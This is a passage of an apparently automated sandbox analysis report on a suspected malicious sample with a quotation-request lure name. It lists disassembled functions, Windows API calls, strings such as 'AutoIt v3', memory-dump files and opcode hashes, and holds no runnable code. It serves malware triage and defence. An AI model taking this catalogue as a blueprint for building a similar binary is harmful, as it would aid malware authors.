                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                    • Instruction ID: 614fb24c1e16410ea03450a603866f0adfc8f454a2453987b23c5f3ddd4f8b96
                                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                    • Instruction Fuzzy Hash: 749155736090E34ADB2D467A857417EFFE16A923B2B1A079DD4F2CA1C1FE14C564F620
                                                                                                                    Function 00F37A4A Relevance: .2, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c97070d0cbd1d98720751e63b71f37e5b5e94026f8273d5066136bf5b1fc9cf8
                                                                                                                    • Instruction ID: 92e9ea95c262398435586fb0db22fdead194370ee850ac57508c7ef1ace05335
                                                                                                                    • Opcode Fuzzy Hash: c97070d0cbd1d98720751e63b71f37e5b5e94026f8273d5066136bf5b1fc9cf8
                                                                                                                    • Instruction Fuzzy Hash: EB617AF2A08349A6DE34BA288C95BBEB3A4DF81770F140919F843DB295D6199E42F315
                                                                                                                    Function 00F37CA7 Relevance: .2, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e6d04a954e76f5f844f604bab67a9096ad8f09508f4220cd44ef7661c9e10453
                                                                                                                    • Instruction ID: 4f1ed011db7026da55855e9846cbd724336863bd5e80155b2b2960d2548e66d5
                                                                                                                    • Opcode Fuzzy Hash: e6d04a954e76f5f844f604bab67a9096ad8f09508f4220cd44ef7661c9e10453
                                                                                                                    • Instruction Fuzzy Hash: 40616BF2E0C74966DE38BA288C55BBF73949F41770F100959F843DB281DA19AD82F255
                                                                                                                    Function 00F31706 Relevance: .2, Instructions: 232COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                    • Instruction ID: c685d9ff3d8cebc9d15ffebb7783edfdbb1ff66f892d75c3c391e388429e8750
                                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                    • Instruction Fuzzy Hash: 38816433A090A349DB6D863A853453EFFE17A923B1B1E079DD4F2CA1C1EE24C564F620
                                                                                                                    Function 00F82046 Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e368dcc111f985badaf476e44c6981459c1074c27c43d85af590bf633b5cd9da
                                                                                                                    • Instruction ID: a4604d1d831552bf837d089d0db4b8128b7b8886e7259d98eb4227311218bf0d
                                                                                                                    • Opcode Fuzzy Hash: e368dcc111f985badaf476e44c6981459c1074c27c43d85af590bf633b5cd9da
                                                                                                                    • Instruction Fuzzy Hash: C6210D327206558BDB68CF79C8536BE73E9A754320F14862EE4A7C73D0DE79A904D780
                                                                                                                    Function 00FA70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FA712F
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA7160
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FA716C
                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00FA7186
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA7195
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FA71C0
                                                                                                                    • GetSysColor.USER32(00000010), ref: 00FA71C8
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00FA71CF
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00FA71DE
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FA71E5
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00FA7230
                                                                                                                    • FillRect.USER32(?,?,?), ref: 00FA7262
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA7284
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColor.USER32(00000012), ref: 00FA7421
                                                                                                                      • Part of subcall function 00FA73E8: SetTextColor.GDI32(?,?), ref: 00FA7425
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColorBrush.USER32(0000000F), ref: 00FA743B
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColor.USER32(0000000F), ref: 00FA7446
                                                                                                                      • Part of subcall function 00FA73E8: GetSysColor.USER32(00000011), ref: 00FA7463
                                                                                                                      • Part of subcall function 00FA73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FA7471
                                                                                                                      • Part of subcall function 00FA73E8: SelectObject.GDI32(?,00000000), ref: 00FA7482
                                                                                                                      • Part of subcall function 00FA73E8: SetBkColor.GDI32(?,00000000), ref: 00FA748B
                                                                                                                      • Part of subcall function 00FA73E8: SelectObject.GDI32(?,?), ref: 00FA7498
                                                                                                                      • Part of subcall function 00FA73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00FA74B7
                                                                                                                      • Part of subcall function 00FA73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FA74CE
                                                                                                                      • Part of subcall function 00FA73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00FA74DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4124339563-0
                                                                                                                    • Opcode ID: 1c4bdff54a7ec421fa70a68a2af6131638cce444da7a7967bc4cf9b8e493e775
                                                                                                                    • Instruction ID: d04c71757c27198e8bae4d89cb1ec8c44354b5f3d08410e3822f7d8d4b2ea011
                                                                                                                    • Opcode Fuzzy Hash: 1c4bdff54a7ec421fa70a68a2af6131638cce444da7a7967bc4cf9b8e493e775
                                                                                                                    • Instruction Fuzzy Hash: EAA1B2B2508305AFDB00AF60DC48E6B7BE9FF4A320F140A19F962961E1D771E944EF91
                                                                                                                    Function 00F28D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00F28E14
                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F66AC5
                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F66AFE
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F66F43
                                                                                                                      • Part of subcall function 00F28F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F28BE8,?,00000000,?,?,?,?,00F28BBA,00000000,?), ref: 00F28FC5
                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00F66F7F
                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F66F96
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F66FAC
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F66FB7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                    • Opcode ID: 8cadbf5f5379b2cb02763ceeeee922029308a9d93c76381e26a6537a2a1878b0
                                                                                                                    • Instruction ID: 71819e3400a04f9dd9f9a23e563ef4ab765d45c6c40bb3983cbb04a783feb7d1
                                                                                                                    • Opcode Fuzzy Hash: 8cadbf5f5379b2cb02763ceeeee922029308a9d93c76381e26a6537a2a1878b0
                                                                                                                    • Instruction Fuzzy Hash: 3512AC30A01655EFDB25CF14D884BAABBE5FB45320F184469F495CB262CB32AC52FB91
                                                                                                                    Function 00F92711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00F9273E
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F9286A
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F928A9
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F928B9
                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F92900
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00F9290C
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F92955
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F92964
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F92974
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F92978
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F92988
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F92991
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00F9299A
                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F929C6
                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F929DD
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F92A1D
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F92A31
                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F92A42
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F92A77
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F92A82
                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F92A8D
                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F92A97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: 8856f8b1c694674b651e845a912d6b1cb2549ef994920e50b845b602df12be23
                                                                                                                    • Instruction ID: 821aa8072f3e24e3cd7da1aad279e681480942fd3f357d98cb91087263e74100
                                                                                                                    • Opcode Fuzzy Hash: 8856f8b1c694674b651e845a912d6b1cb2549ef994920e50b845b602df12be23
                                                                                                                    • Instruction Fuzzy Hash: ACB14BB1A00219AFEB14DFA9CC89FAE7BA9FB49710F004115F915EB290D774ED40DBA0
                                                                                                                    Function 00F84ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F84AED
                                                                                                                    • GetDriveTypeW.KERNEL32(?,00FACB68,?,\\.\,00FACC08), ref: 00F84BCA
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00FACB68,?,\\.\,00FACC08), ref: 00F84D36
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: f6a13042484865ddfe7f19038c239a61008b03947770fac047b195350e3fd488
                                                                                                                    • Instruction ID: eb7b14fa1092df947b0eb08cf93c6d7ad20cbce641cda72bf6fe02146a7227d4
                                                                                                                    • Opcode Fuzzy Hash: f6a13042484865ddfe7f19038c239a61008b03947770fac047b195350e3fd488
                                                                                                                    • Instruction Fuzzy Hash: F96194317052079BCB04FF14CA81AE9B7B6AB46354B288416F806EB791DB75FD41FB82
                                                                                                                    Function 00FA73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00FA7421
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FA7425
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA743B
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FA7446
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00FA744B
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00FA7463
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FA7471
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FA7482
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00FA748B
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA7498
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FA74B7
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FA74CE
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FA74DB
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FA752A
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FA7554
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00FA7572
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00FA757D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00FA758E
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FA7596
                                                                                                                    • DrawTextW.USER32(?,00FA70F5,000000FF,?,00000000), ref: 00FA75A8
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA75BF
                                                                                                                    • DeleteObject.GDI32(?), ref: 00FA75CA
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00FA75D0
                                                                                                                    • DeleteObject.GDI32(?), ref: 00FA75D5
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FA75DB
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00FA75E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: e01153b07c05bf7d059e4f8e0e1a4f63615f305519ae55e77abcaf9b74305584
                                                                                                                    • Instruction ID: ad1c4316043c7074d9f991e594f814ae4c952015e914f71667790acf4b402c58
                                                                                                                    • Opcode Fuzzy Hash: e01153b07c05bf7d059e4f8e0e1a4f63615f305519ae55e77abcaf9b74305584
                                                                                                                    • Instruction Fuzzy Hash: 3B6171B2D00218AFDF019FA4DC49EAE7FB9EF0A320F154125F915AB2A1D7749940EF90
                                                                                                                    Function 00FA0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA1128
                                                                                                                    • GetDesktopWindow.USER32 ref: 00FA113D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FA1144
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA1199
                                                                                                                    • DestroyWindow.USER32(?), ref: 00FA11B9
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FA11ED
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA120B
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA121D
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FA1232
                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FA1245
                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00FA12A1
                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FA12BC
                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FA12D0
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FA12E8
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00FA130E
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00FA1328
                                                                                                                    • CopyRect.USER32(?,?), ref: 00FA133F
                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FA13AA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                    • Opcode ID: 90e5e1787551b5f540acf3288884726b709634f63554d215b71eaadf750b6b68
                                                                                                                    • Instruction ID: 47faa9f0e2d8ef3fd6e95de5606e80df042d81665389117227de7549c4d63c71
                                                                                                                    • Opcode Fuzzy Hash: 90e5e1787551b5f540acf3288884726b709634f63554d215b71eaadf750b6b68
                                                                                                                    • Instruction Fuzzy Hash: F2B19DB1608341AFDB04DF64C884BABBBE5FF85350F00891CF9999B2A1D771E844EB91
                                                                                                                    Function 00FA0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FA02E5
                                                                                                                    • _wcslen.LIBCMT ref: 00FA031F
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0389
                                                                                                                    • _wcslen.LIBCMT ref: 00FA03F1
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0475
                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FA04C5
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FA0504
                                                                                                                      • Part of subcall function 00F2F9F2: _wcslen.LIBCMT ref: 00F2F9FD
                                                                                                                      • Part of subcall function 00F7223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F72258
                                                                                                                      • Part of subcall function 00F7223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F7228A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
